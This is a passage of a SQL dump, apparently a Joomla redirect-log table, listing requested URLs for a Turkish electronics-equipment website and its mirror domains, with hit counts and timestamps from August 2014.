00:00:00',301),(3280,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-17 00:01:10','0000-00-00 00:00:00',301),(3281,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',2,0,'2014-08-17 00:10:15','0000-00-00 00:00:00',301),(3282,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',3,0,'2014-08-17 00:10:52','0000-00-00 00:00:00',301),(3283,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',3,0,'2014-08-17 00:17:42','0000-00-00 00:00:00',301),(3284,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',4,0,'2014-08-17 00:47:08','0000-00-00 00:00:00',301),(3285,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',4,0,'2014-08-17 00:51:14','0000-00-00 00:00:00',301),(3286,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',6,0,'2014-08-17 00:55:35','0000-00-00 00:00:00',301),(3287,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',7,0,'2014-08-17 00:58:04','0000-00-00 00:00:00',301),(3288,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',1,0,'2014-08-17 01:04:39','0000-00-00 00:00:00',301),(3289,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',3,0,'2014-08-17 01:08:37','0000-00-00 00:00:00',301),(3290,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',3,0,'2014-08-17 01:10:47','0000-00-00 00:00:00',301),(3291,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',11,0,'2014-08-17 01:24:49','0000-00-00 00:00:00',301),(3292,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',10,0,'2014-08-17 02:24:22','0000-00-00 00:00:00',301),(3293,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',3,0,'2014-08-17 02:53:14','0000-00-00 00:00:00',301),(3294,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',3,0,'2014-08-17 03:01:17','0000-00-00 00:00:00',301),(3295,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',1,0,'2014-08-17 03:11:37','0000-00-00 00:00:00',301),(3296,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',2,0,'2014-08-17 03:22:00','0000-00-00 00:00:00',301),(3297,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118','','','',1,0,'2014-08-17 03:59:12','0000-00-00 00:00:00',301),(3298,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',7,0,'2014-08-17 04:27:14','0000-00-00 00:00:00',301),(3299,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',2,0,'2014-08-17 05:06:40','0000-00-00 00:00:00',301),(3300,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',5,0,'2014-08-17 05:18:27','0000-00-00 00:00:00',301),(3301,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',4,0,'2014-08-17 05:36:48','0000-00-00 00:00:00',301),(3302,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',1,0,'2014-08-17 05:39:15','0000-00-00 00:00:00',301),(3303,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',3,0,'2014-08-17 05:43:59','0000-00-00 00:00:00',301),(3304,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',1,0,'2014-08-17 05:51:27','0000-00-00 00:00:00',301),(3305,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',7,0,'2014-08-17 05:56:35','0000-00-00 00:00:00',301),(3306,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',5,0,'2014-08-17 06:17:49','0000-00-00 00:00:00',301),(3307,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',2,0,'2014-08-17 06:21:32','0000-00-00 00:00:00',301),(3308,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',7,0,'2014-08-17 06:29:20','0000-00-00 00:00:00',301),(3309,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',4,0,'2014-08-17 06:32:03','0000-00-00 00:00:00',301),(3310,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',6,0,'2014-08-17 06:34:42','0000-00-00 00:00:00',301),(3311,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',7,0,'2014-08-17 06:59:40','0000-00-00 00:00:00',301),(3312,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',3,0,'2014-08-17 07:45:43','0000-00-00 00:00:00',301),(3313,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',18,0,'2014-08-17 08:04:04','0000-00-00 00:00:00',301),(3314,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',18,0,'2014-08-17 08:04:18','0000-00-00 00:00:00',301),(3315,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',18,0,'2014-08-17 08:04:55','0000-00-00 00:00:00',301),(3316,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',18,0,'2014-08-17 08:05:01','0000-00-00 00:00:00',301),(3317,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=124&Itemid=130','','','',18,0,'2014-08-17 08:06:01','0000-00-00 00:00:00',301),(3318,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',49,0,'2014-08-17 08:06:06','0000-00-00 00:00:00',301),(3319,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139','','','',24,0,'2014-08-17 08:06:13','0000-00-00 00:00:00',301),(3320,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',25,0,'2014-08-17 08:07:22','0000-00-00 00:00:00',301),(3321,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=t','','','',25,0,'2014-08-17 08:07:29','0000-00-00 00:00:00',301),(3322,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138&Itemid=140','','','',24,0,'2014-08-17 08:08:17','0000-00-00 00:00:00',301),(3323,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139&Itemid=141','','','',23,0,'2014-08-17 08:08:25','0000-00-00 00:00:00',301),(3324,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',24,0,'2014-08-17 08:08:36','0000-00-00 00:00:00',301),(3325,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140&Itemid=142','','','',23,0,'2014-08-17 08:08:42','0000-00-00 00:00:00',301),(3326,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',24,0,'2014-08-17 08:09:16','0000-00-00 00:00:00',301),(3327,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141&Itemid=143','','','',24,0,'2014-08-17 08:09:20','0000-00-00 00:00:00',301),(3328,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',24,0,'2014-08-17 08:09:34','0000-00-00 00:00:00',301),(3329,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',24,0,'2014-08-17 08:09:43','0000-00-00 00:00:00',301),(3330,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',24,0,'2014-08-17 08:09:48','0000-00-00 00:00:00',301),(3331,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',24,0,'2014-08-17 08:09:53','0000-00-00 00:00:00',301),(3332,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168&Itemid=58','','','',25,0,'2014-08-17 08:09:58','0000-00-00 00:00:00',301),(3333,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=81&Itemid=40','','','',25,0,'2014-08-17 08:10:36','0000-00-00 00:00:00',301),(3334,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=88&Itemid=100','','','',25,0,'2014-08-17 08:10:47','0000-00-00 00:00:00',301),(3335,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=90&Itemid=102','','','',22,0,'2014-08-17 08:11:49','0000-00-00 00:00:00',301),(3336,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=99&Itemid=43','','','',24,0,'2014-08-17 08:11:54','0000-00-00 00:00:00',301),(3337,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39&Itemid=57','','','',34,0,'2014-08-17 08:11:58','0000-00-00 00:00:00',301),(3338,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60','','','',34,0,'2014-08-17 08:12:06','0000-00-00 00:00:00',301),(3339,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41&Itemid=55','','','',31,0,'2014-08-17 08:12:12','0000-00-00 00:00:00',301),(3340,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42&Itemid=27','','','',35,0,'2014-08-17 08:12:16','0000-00-00 00:00:00',301),(3341,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43&Itemid=2','','','',34,0,'2014-08-17 08:12:49','0000-00-00 00:00:00',301),(3342,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44&Itemid=56','','','',34,0,'2014-08-17 08:12:59','0000-00-00 00:00:00',301),(3343,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46&Itemid=62','','','',34,0,'2014-08-17 08:13:05','0000-00-00 00:00:00',301),(3344,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=49&Itemid=61','','','',34,0,'2014-08-17 08:13:17','0000-00-00 00:00:00',301),(3345,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51&Itemid=92','','','',34,0,'2014-08-17 08:13:26','0000-00-00 00:00:00',301),(3346,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=53&Itemid=110','','','',33,0,'2014-08-17 08:13:33','0000-00-00 00:00:00',301),(3347,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54&Itemid=114','','','',32,0,'2014-08-17 08:13:51','0000-00-00 00:00:00',301),(3348,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56&Itemid=137','','','',32,0,'2014-08-17 08:13:56','0000-00-00 00:00:00',301),(3349,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57&Itemid=145','','','',32,0,'2014-08-17 08:13:59','0000-00-00 00:00:00',301),(3350,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',2,0,'2014-08-17 08:14:03','0000-00-00 00:00:00',301),(3351,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58&Itemid=149','','','',32,0,'2014-08-17 08:14:04','0000-00-00 00:00:00',301),(3352,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&Itemid=155','','','',32,0,'2014-08-17 08:14:40','0000-00-00 00:00:00',301),(3353,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60&Itemid=164','','','',32,0,'2014-08-17 08:14:46','0000-00-00 00:00:00',301),(3354,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',32,0,'2014-08-17 08:14:55','0000-00-00 00:00:00',301),(3355,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',32,0,'2014-08-17 08:15:10','0000-00-00 00:00:00',301),(3356,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',5,0,'2014-08-17 08:23:23','0000-00-00 00:00:00',301),(3357,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81','','','',1,0,'2014-08-17 08:54:02','0000-00-00 00:00:00',301),(3358,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',13,0,'2014-08-17 08:56:03','0000-00-00 00:00:00',301),(3359,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',8,0,'2014-08-17 09:06:17','0000-00-00 00:00:00',301),(3360,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',5,0,'2014-08-17 09:32:29','0000-00-00 00:00:00',301),(3361,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',1,0,'2014-08-17 09:42:55','0000-00-00 00:00:00',301),(3362,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',8,0,'2014-08-17 09:47:19','0000-00-00 00:00:00',301),(3363,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',6,0,'2014-08-17 09:51:20','0000-00-00 00:00:00',301),(3364,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',2,0,'2014-08-17 10:08:17','0000-00-00 00:00:00',301),(3365,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',4,0,'2014-08-17 10:25:19','0000-00-00 00:00:00',301),(3366,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160','','','',2,0,'2014-08-17 10:29:01','0000-00-00 00:00:00',301),(3367,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',8,0,'2014-08-17 10:36:28','0000-00-00 00:00:00',301),(3368,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-17 10:50:59','0000-00-00 00:00:00',301),(3369,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',10,0,'2014-08-17 11:08:50','0000-00-00 00:00:00',301),(3370,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',3,0,'2014-08-17 11:24:34','0000-00-00 00:00:00',301),(3371,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',6,0,'2014-08-17 11:50:29','0000-00-00 00:00:00',301),(3372,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',7,0,'2014-08-17 12:03:00','0000-00-00 00:00:00',301),(3373,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',4,0,'2014-08-17 12:06:42','0000-00-00 00:00:00',301),(3374,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',9,0,'2014-08-17 12:08:33','0000-00-00 00:00:00',301),(3375,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',4,0,'2014-08-17 12:08:50','0000-00-00 00:00:00',301),(3376,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',4,0,'2014-08-17 12:16:26','0000-00-00 00:00:00',301),(3377,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',2,0,'2014-08-17 12:27:55','0000-00-00 00:00:00',301),(3378,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',6,0,'2014-08-17 12:35:50','0000-00-00 00:00:00',301),(3379,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',6,0,'2014-08-17 12:44:40','0000-00-00 00:00:00',301),(3380,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',2,0,'2014-08-17 12:47:10','0000-00-00 00:00:00',301),(3381,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',5,0,'2014-08-17 12:48:31','0000-00-00 00:00:00',301),(3382,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',2,0,'2014-08-17 12:53:22','0000-00-00 00:00:00',301),(3383,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',7,0,'2014-08-17 13:00:22','0000-00-00 00:00:00',301),(3384,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',10,0,'2014-08-17 13:02:12','0000-00-00 00:00:00',301),(3385,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-17 13:05:38','0000-00-00 00:00:00',301),(3386,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',6,0,'2014-08-17 13:18:00','0000-00-00 00:00:00',301),(3387,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164','','','',7,0,'2014-08-17 13:36:49','0000-00-00 00:00:00',301),(3388,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/archived-articles/2011','','','',16,0,'2014-08-17 13:37:17','0000-00-00 00:00:00',301),(3389,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',87,0,'2014-08-17 13:37:34','0000-00-00 00:00:00',301),(3390,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',4,0,'2014-08-17 13:39:44','0000-00-00 00:00:00',301),(3391,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',6,0,'2014-08-17 13:42:10','0000-00-00 00:00:00',301),(3392,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',91,0,'2014-08-17 13:42:54','0000-00-00 00:00:00',301),(3393,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',98,0,'2014-08-17 13:48:24','0000-00-00 00:00:00',301),(3394,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',88,0,'2014-08-17 13:48:53','0000-00-00 00:00:00',301),(3395,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',4,0,'2014-08-17 13:49:45','0000-00-00 00:00:00',301),(3396,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',3,0,'2014-08-17 13:50:20','0000-00-00 00:00:00',301),(3397,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',3,0,'2014-08-17 13:50:30','0000-00-00 00:00:00',301),(3398,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',4,0,'2014-08-17 13:50:55','0000-00-00 00:00:00',301),(3399,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',3,0,'2014-08-17 13:51:28','0000-00-00 00:00:00',301),(3400,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',220,0,'2014-08-17 13:53:41','0000-00-00 00:00:00',301),(3401,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',4,0,'2014-08-17 13:54:55','0000-00-00 00:00:00',301),(3402,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',4,0,'2014-08-17 13:55:19','0000-00-00 00:00:00',301),(3403,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',4,0,'2014-08-17 13:56:07','0000-00-00 00:00:00',301),(3404,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',2,0,'2014-08-17 14:00:35','0000-00-00 00:00:00',301),(3405,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',4,0,'2014-08-17 14:02:37','0000-00-00 00:00:00',301),(3406,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',5,0,'2014-08-17 14:03:02','0000-00-00 00:00:00',301),(3407,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',1,0,'2014-08-17 14:08:19','0000-00-00 00:00:00',301),(3408,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115','','','',1,0,'2014-08-17 14:44:19','0000-00-00 00:00:00',301),(3409,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',3,0,'2014-08-17 14:50:59','0000-00-00 00:00:00',301),(3410,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',5,0,'2014-08-17 15:30:22','0000-00-00 00:00:00',301),(3411,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',20,0,'2014-08-17 16:23:28','0000-00-00 00:00:00',301),(3412,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',23,0,'2014-08-17 16:23:33','0000-00-00 00:00:00',301),(3413,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',25,0,'2014-08-17 16:23:38','0000-00-00 00:00:00',301),(3414,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',24,0,'2014-08-17 16:23:44','0000-00-00 00:00:00',301),(3415,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79','','','',2,0,'2014-08-17 16:37:19','0000-00-00 00:00:00',301),(3416,'http://www.3s-technologies.com.tr/index.php/tr/parks-home','','','',87,0,'2014-08-17 18:21:33','0000-00-00 00:00:00',301),(3417,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',2,0,'2014-08-17 18:42:35','0000-00-00 00:00:00',301),(3418,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',23,0,'2014-08-17 18:43:02','0000-00-00 00:00:00',301),(3419,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',5,0,'2014-08-17 18:46:59','0000-00-00 00:00:00',301),(3420,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=0&lang=tr','','','',1,0,'2014-08-17 18:57:44','0000-00-00 00:00:00',301),(3421,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',4,0,'2014-08-17 19:24:50','0000-00-00 00:00:00',301),(3422,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',5,0,'2014-08-17 20:08:18','0000-00-00 00:00:00',301),(3423,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',6,0,'2014-08-17 20:30:25','0000-00-00 00:00:00',301),(3424,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',1,0,'2014-08-17 20:33:43','0000-00-00 00:00:00',301),(3425,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',3,0,'2014-08-17 20:36:53','0000-00-00 00:00:00',301),(3426,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=&lang=tr','','','',1,0,'2014-08-17 20:38:25','0000-00-00 00:00:00',301),(3427,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',1,0,'2014-08-17 21:09:00','0000-00-00 